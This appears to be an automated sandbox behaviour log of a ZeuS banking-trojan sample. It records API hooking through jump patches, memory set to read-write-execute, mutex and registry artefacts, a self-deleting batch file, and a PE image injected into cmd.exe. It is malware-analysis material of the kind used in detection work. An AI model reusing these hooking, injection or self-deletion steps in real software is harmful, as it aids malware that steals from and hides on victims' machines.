Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D9BA6BF Length: 30 Value: 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 2002754584
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002755232
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0032 Length: 10 Value: 8B FF 55 8B EC E9 88 A6 C1 3C success or wait 2002755427
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D9BA6BF Length: 5 Value: E9 3E 9A 24 C3 success or wait 2002756813
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D9BA666 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 2002758122
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002758719
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA003C Length: 10 Value: 8B FF 55 8B EC E9 25 A6 C1 3C success or wait 2002759079
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D9BA666 Length: 5 Value: E9 33 9B 24 C3 success or wait 2002759986
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D949088 Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 2002762174
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002762827
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0046 Length: 10 Value: 8B FF 55 8B EC E9 3D 90 BA 3C success or wait 2002763186
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D949088 Length: 5 Value: E9 AD B1 2B C3 success or wait 2002764095
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94654B Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 2002766350
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002767001
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0050 Length: 10 Value: 8B FF 55 8B EC E9 F6 64 BA 3C success or wait 2002767360
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94654B Length: 5 Value: E9 2D DD 2B C3 success or wait 2002768275
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D963381 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 2002770289
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002770943
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA005A Length: 10 Value: 8B FF 55 8B EC E9 22 33 BC 3C success or wait 2002771302
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D963381 Length: 5 Value: E9 36 0F 2A C3 success or wait 2002772211
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94BF83 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2002774416
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002775066
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0064 Length: 10 Value: 8B FF 55 8B EC E9 1A BF BA 3C success or wait 2002775424
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94BF83 Length: 5 Value: E9 7E 83 2B C3 success or wait 2002776334
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94878D Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 2002778646
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002779214
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA006E Length: 10 Value: 8B FF 55 8B EC E9 1A 87 BA 3C success or wait 2002779572
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94878D Length: 5 Value: E9 A0 BB 2B C3 success or wait 2002780483
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2002781514
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002782554
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0078 Length: 10 Value: 8B FF 55 8B EC E9 AE 3D D1 70 success or wait 2002782914
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 71AB3E2B Length: 5 Value: E9 83 8A 14 8F success or wait 2002783831
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2002784848
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002785505
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0082 Length: 10 Value: 8B FF 55 8B EC E9 A0 4B D1 70 success or wait 2002785866
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 71AB4C27 Length: 5 Value: E9 BF 7C 14 8F success or wait 2002786783
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2002787787
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002788387
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA008C Length: 10 Value: 8B FF 55 8B EC E9 69 68 D1 70 success or wait 2002788746
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 71AB68FA Length: 5 Value: E9 0D 60 14 8F success or wait 2002789659
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2002791252
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002791904
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2002794728
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002795375
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2002798203
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002798852
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2002801586
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002802236
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2002805020
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002805672
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2002808262
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002808933
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2002814752
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002815418
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2002817870
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002818465
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2002821150
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002821744
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2002824136
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002824734
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2002827398
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002828050
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E42A97D Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 2002830750
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002831344
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E41A39A Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 2002834061
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002834652
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E42EA5E Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 2002837444
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002838093
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002841480
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002844799
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002848104
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002851439
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002854760
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002858076
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002861448
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002864552
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002870922
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002874340
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002877702
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002880959
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002884041
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002887348
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002890569
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002893867
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002897182
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002900419
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002903716
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002906936
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002910228
Mutant created Name: \BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 2002918842
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: Okmaykid success or wait 2002919377
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: Okmaykid success or wait 2002919983
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid Type: Binary Data: 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 2002921920
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2002988635
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2002994639
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Offset: none Length: 206 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 success or wait 2002999821
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and write and read and execute and extend size Type: image Baseaddress: BE0000 Size: 172032 Protection: readonly Mapped to pid: own pid success or wait 2003005825
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: DB0000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2003007863
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2003028568
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: C20000 Size: 389120 Protection: execute Mapped to pid: own pid success or wait 2003030746
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: C20000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2003031796
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: C20000 Size: 389120 Protection: execute Mapped to pid: own pid success or wait 2003033541
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: C20000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2003034443
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: C20000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2003041594
Process created PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Cmdline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Createflags: 0 success or wait 2003044715
System info queried Type: ProcessInformation success or wait 2003051859
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: C20000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2003054566
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2E59-CCC3D8887706} success or wait 2003106564
Memory allocated PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 140000 Length: 12E674 Allocation Type: null Protection: page execute and read and write success or wait 2003106720
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 140000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2003107592
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 140000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2003107723
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 140000 Length: 159744 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 00 success or wait 2003109680
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 162D50 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2003110519
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 162000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2003110647
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 162D50 Length: 4 Value: 00 00 00 00 success or wait 2003110804
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 162D64 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2003110926
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 162000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2003111050
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 162D64 Length: 4 Value: 00 00 14 00 success or wait 2003111205
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 163214 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2003111341
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 163000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2003111469
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 163214 Length: 4 Value: 08 00 00 00 success or wait 2003111625
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 163218 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2003111760
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 163000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2003111887
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 163218 Length: 4 Value: 0C 00 00 00 success or wait 2003112044
Process terminated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe success or wait 2003738647
Analysis File: hianh.exe PID: 224 Parent PID: 1960
+ Sections
+ General
Start time: 06:06:38
Start date: 01/12/2011
Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe
Commandline: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe
Imagebase: 0x400000
File size: 171520 bytes
MD5 hash: 0FA8C6FF6A0816FF75416A307F79FC7A
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\887021879.log read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 3B182A
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 41AE9D
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\887021879.log none 5 31 36 37 39 30 success or wait 1 3B1939
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe none 171520 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 41AEF0
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
none query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
